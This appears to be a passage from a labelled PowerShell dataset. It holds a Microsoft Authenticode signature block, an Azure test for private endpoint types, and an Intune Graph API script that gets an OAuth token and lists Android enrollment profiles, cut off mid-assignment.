0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFRELB4msPv5Aq8v97SisMZW # gyh2St379P3wi3u2d+qFMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAp5RslEFWPp7oQa0A47JqxkgghFrQOtiT5jI7gMAnZv0sVGM3lpTgcih/ # WP88PhUF5tOESUpvmf7nTsOqFfpk9fZwvUPDciVnhwGAdUywfTXBkJKR3sZzxogJ # rYSW0SHOsy7pyLUHRrx3J4clvv3brRNnDQiszyqv9bx7Mrx9Jpo+YyqKj0t+jM+x # +PpzXdI7wWSHgngLByyCwha3GyZz760m0zSbjW3qIX8FM2d8Ld2ogw4jpCFkIWMP # TWw/Zust6SjRglJcJ8zbhOqwKo2bon0Qu3SIwcs89RUQnzIvuSIi2Kk11zpzhdcs # uQsI8wD9TzXstHmel5WnPvloQ3zkQaGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBkwF9l5rRRZb2jdY1ghFhpWuiVk2lBIFh37RYUDPwNigIGZdYHYDhG # GBMyMDI0MDIyODA5NTUwNi41NThaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjE3OUUtNEJCMC04MjQ2MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHg1PwfExUffl0AAQAAAeAwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzE5WhcNMjUwMTEwMTkwNzE5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoxNzlFLTRC # QjAtODI0NjElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKyHnPOhxbvRATnGjb/6fuBh # h3ZLzotAxAgdLaZ/zkRFUdeSKzyNt3tqorMK7GDvcXdKs+qIMUbvenlH+w53ssPa # 6rYP760ZuFrABrfserf0kFayNXVzwT7jarJOEjnFMBp+yi+uwQ2TnJuxczceG5FD # HrII6sF6F879lP6ydY0BBZkZ9t39e/svNRieA5gUnv/YcM/bIMY/QYmd9F0B+ebF # Yi+PH4AkXahNkFgK85OIaRrDGvhnxOa/5zGL7Oiii7+J9/QHkdJGlfnRfbQ3QXM/ # 5/umBOKG4JoFY1niZ5RVH5PT0+uCjwcqhTbnvUtfK+N+yB2b9rEZvp2Tv4ZwYzEd # 9A9VsYMuZiCSbaFMk77LwVbklpnw4aHWJXJkEYmJvxRbcThE8FQyOoVkSuKc5OWZ # 2+WM/j50oblA0tCU53AauvUOZRoQBh89nHK+m5pOXKXdYMJ+ceuLYF8h5y/cXLQM # OmqLJz5l7MLqGwU0zHV+MEO8L1Fo2zEEQ4iL4BX8YknKXonHGQacSCaLZot2kyJV # RsFSxn0PlPvHVp0YdsCMzdeiw9jAZ7K9s1WxsZGEBrK/obipX6uxjEpyUA9mbVPl # jlb3R4MWI0E2xI/NM6F4Ac8Ceax3YWLT+aWCZeqiIMLxyyWZg+i1KY8ZEzMeNTKC # EI5wF1wxqr6T1/MQo+8tAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUcF4XP26dV+8S # usoA1XXQ2TDSmdIwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAMATzg6R/A0ldO7M # qGxD1VJji5yVA1hHb0Hc0Yjtv7WkxQ8iwfflulX5Us64tD3+3NT1JkphWzaAWf2w # KdAw35RxtQG1iON3HEZ0X23nde4Kg/Wfbx5rEHkZ9bzKnR/2N5A16+w/1pbwJzdf # RcnJT3cLyawr/kYjMWd63OP0Glq70ua4WUE/Po5pU7rQRbWEoQozY24hAqOcwuRc # m6Cb0JBeTOCeRBntEKgjKep4pRaQt7b9vusT97WeJcfaVosmmPtsZsawgnpIjbBa # 55tHfuk0vDkZtbIXjU4mr5dns9dnanBdBS2PY3N3hIfCPEOszquwHLkfkFZ/9bxw # 8/eRJldtoukHo16afE/AqP/smmGJh5ZR0pmgW6QcX+61rdi5kDJTzCFaoMyYzUS0 # SEbyrDZ/p2KOuKAYNngljiOlllct0uJVz2agfczGjjsKi2AS1WaXvOhgZNmGw42S # FB1qaloa8Kaux9Q2HHLE8gee/5rgOnx9zSbfVUc7IcRNodq6R7v+Rz+P6XKtOgyC # qW/+rhPmp/n7Fq2BGTRkcy//hmS32p6qyglr2K4OoJDJXxFs6lwc8D86qlUeGjUy # o7hVy5VvyA+y0mGnEAuA85tsOcUPlzwWF5sv+B5fz35OW3X4Spk5SiNulnLFRPM5 # XCsSHqvcbC8R3qwj2w1evPhZxDuNMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjox # NzlFLTRCQjAtODI0NjElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAbfPR1fBX6HxYfyPx8zYzJU5fIQyggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOmJFk4wIhgPMjAyNDAyMjgxMDE3NTBaGA8yMDI0MDIyOTEwMTc1MFowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6YkWTgIBADAHAgEAAgIaCDAHAgEAAgJFEDAKAgUA # 6YpnzgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAEnXAPETMUZDtE0BpenI # /NEAmIJ54O2KtSf1EfUS69X4Az+lFg+j18mFK0gKjiFdxb/AeozwbND9wRJK+wm5 # qusbXdQMD8+2bGbQ13Fqyk+X9DBgy+ww6edKaTZo0ORTG7m9P5sNZOu+OdNNCPk7 # SugDO1mCqO/ybsBbOIkZni7qMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHg1PwfExUffl0AAQAAAeAwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgRjSHkxTOKRzM1S+nECuFm4TCaM/OA+rqaYGx240gjc8wgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCDj7lK/8jnlbTjPvc77DCCSb4TZApY9nJm5whsK/2kK # wTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4NT8 # HxMVH35dAAEAAAHgMCIEIJTdGuA++QREm07GEZDV9Tx8t8gso1Kuc5Nj0uFURwcN # MA0GCSqGSIb3DQEBCwUABIICAIHGvy3WhYBIaMKevYSceG5gvvYxxjpqPOOR+rHt # cRgyBhDEVe2IlNbS8k06B96rzvjCLKfw2ku55E/KzuolHKD73dHfoTDV/aD1ve02 # gUOVTL9210LZZD3hI6EmP4t8poEUYsjooZn6OSmtRwOjIHmYrEVHSq4iialp5D/I # l7ci9XlMWOkywTe2igqLGVq6+Iw1MFpp4Ag4ahAOY0v0l0gm7ISo9dahcyZqFigY # EnWlnPNGKTS03x386f3oV+M91W88vXi7B8ilIxdPBwERQff8piR0QDhkd2u0nQHB # 1q9efPC+xlIJJYpGo/vEeJwk82np8Du/EnB+SGKs0/ONFMq9qB97OT/jycccHYMd # ddNpesxO3uB+8WdYyjYZVdmvJ97nScPvF1bhGWvobDsGY+kvfJEs40YbUm/dfnFM # yOYX9cjXQlM9cJcROeC+Xwj5Xz2OBC2/Yer09a6wHfluuw2ptSXvltKuyLL8iSoZ # AU6w5atcsjoVZbxOOnVnn2IbN0pJ8oXZPTDk6/p5rhCAEIAyeFhp3VoQ8m8+lasD # 8sgPezcOXhgfcfI7TR2Yl/yEiojLuSz3vQ3Q1u4qxDv/w3IM8o+jqxX5BecoRbvK # 7s029H/OGlbanAs747ljWHDKofdnMkF7K8cku2xSI6byNIrxx3JIKJwCGqZKMP96 # FkQj # SIG # End signature block
combined_dataset/train/non-malicious/3977.ps1
3977.ps1
function Check-CmdletReturnType { param($cmdletName, $cmdletReturn) $cmdletData = Get-Command $cmdletName; Assert-NotNull $cmdletData; [array]$cmdletReturnTypes = $cmdletData.OutputType.Name | Foreach-Object { return ($_ -replace "Microsoft.Azure.Commands.Network.Models.","") }; [array]$cmdletReturnTypes = $cmdletReturnTypes | Foreach-Object { return ($_ -replace "System.","") }; $realReturnType = $cmdletReturn.GetType().Name -replace "Microsoft.Azure.Commands.Network.Models.",""; return $cmdletReturnTypes -contains $realReturnType; } function Test-AvailablePrivateEndpointTypeCRUD { $rgname = Get-ResourceGroupName; $rglocation = Get-ProviderLocation ResourceManagement; $location = Get-ProviderLocation "Microsoft.Network/availablePrivateEndpointTypes" "westus"; try { $resourceGroup = New-AzResourceGroup -Name $rgname -Location $rglocation; $vAvailablePrivateEndpointType = Get-AzAvailablePrivateEndpointType -Location $location; Assert-True { Check-CmdletReturnType "Get-AzAvailablePrivateEndpointType" $vAvailablePrivateEndpointType }; Assert-NotNull $vAvailablePrivateEndpointType; } finally { Clean-ResourceGroup $rgname; } }
combined_dataset/train/non-malicious/103.ps1
103.ps1
function Get-AuthToken { [cmdletbinding()] param ( [Parameter(Mandatory=$true)] $User ) $userUpn = New-Object "System.Net.Mail.MailAddress" -ArgumentList $User $tenant = $userUpn.Host Write-Host "Checking for AzureAD module..." $AadModule = Get-Module -Name "AzureAD" -ListAvailable if ($AadModule -eq $null) { Write-Host "AzureAD PowerShell module not found, looking for AzureADPreview" $AadModule = Get-Module -Name "AzureADPreview" -ListAvailable } if ($AadModule -eq $null) { write-host write-host "AzureAD Powershell module not installed..." -f Red write-host "Install by running 'Install-Module AzureAD' or 'Install-Module AzureADPreview' from an elevated PowerShell prompt" -f Yellow write-host "Script can't continue..." -f Red write-host exit } if($AadModule.count -gt 1){ $Latest_Version = ($AadModule | select version | Sort-Object)[-1] $aadModule = $AadModule | ? { $_.version -eq $Latest_Version.version } if($AadModule.count -gt 1){ $aadModule = $AadModule | select -Unique } $adal = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.dll" $adalforms = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.Platform.dll" } else { $adal = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.dll" $adalforms = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.Platform.dll" } [System.Reflection.Assembly]::LoadFrom($adal) | Out-Null [System.Reflection.Assembly]::LoadFrom($adalforms) | Out-Null $clientId = "d1ddf0e4-d672-4dae-b554-9d5bdfd93547" $redirectUri = "urn:ietf:wg:oauth:2.0:oob" $resourceAppIdURI = "https://graph.microsoft.com" $authority = "https://login.microsoftonline.com/$Tenant" try { $authContext = New-Object "Microsoft.IdentityModel.Clients.ActiveDirectory.AuthenticationContext" -ArgumentList $authority $platformParameters = New-Object "Microsoft.IdentityModel.Clients.ActiveDirectory.PlatformParameters" -ArgumentList "Auto" $userId = New-Object "Microsoft.IdentityModel.Clients.ActiveDirectory.UserIdentifier" -ArgumentList ($User, "OptionalDisplayableId") $authResult = $authContext.AcquireTokenAsync($resourceAppIdURI,$clientId,$redirectUri,$platformParameters,$userId).Result if($authResult.AccessToken){ $authHeader = @{ 'Content-Type'='application/json' 'Authorization'="Bearer " + $authResult.AccessToken 'ExpiresOn'=$authResult.ExpiresOn } return $authHeader } else { Write-Host Write-Host "Authorization Access Token is null, please re-run authentication..." -ForegroundColor Red Write-Host break } } catch { write-host $_.Exception.Message -f Red write-host $_.Exception.ItemName -f Red write-host break } } Function Get-AndroidEnrollmentProfile { $graphApiVersion = "Beta" $Resource = "deviceManagement/androidDeviceOwnerEnrollmentProfiles" try { $now = (Get-Date -Format s) $uri = "https://graph.microsoft.com/$graphApiVersion/$($Resource)?`$filter=tokenExpirationDateTime gt $($now)z" (Invoke-RestMethod -Uri $uri –Headers $authToken –Method Get).value } catch { $ex = $_.Exception $errorResponse = $ex.Response.GetResponseStream() $reader = New-Object System.IO.StreamReader($errorResponse) $reader.BaseStream.Position = 0 $reader.DiscardBufferedData() $responseBody = $reader.ReadToEnd(); Write-Host "Response content:`n$responseBody" -f Red Write-Error "Request to $Uri failed with HTTP Status $($ex.Response.StatusCode) $($ex.Response.StatusDescription)" write-host break } } write-host if($global:authToken){ $DateTime = (Get-Date).ToUniversalTime() $TokenExpires = ($authToken.ExpiresOn.datetime - $DateTime).Minutes if($TokenExpires -le 0){ write-host "Authentication Token expired" $TokenExpires "minutes ago" -ForegroundColor Yellow write-host if($User -eq $null -or $User -eq ""){ $User = Read-Host -Prompt "Please specify your user principal name for Azure Authentication" Write-Host } $global:authToken = Get-AuthToken -User $User } } else { if($User -eq $null -or $User -eq ""){ $User = Read-Host -Prompt "Please specify your user principal name for Azure Authentication" Write-Host } $global:authToken = Get-AuthToken -User $User } $Profiles = 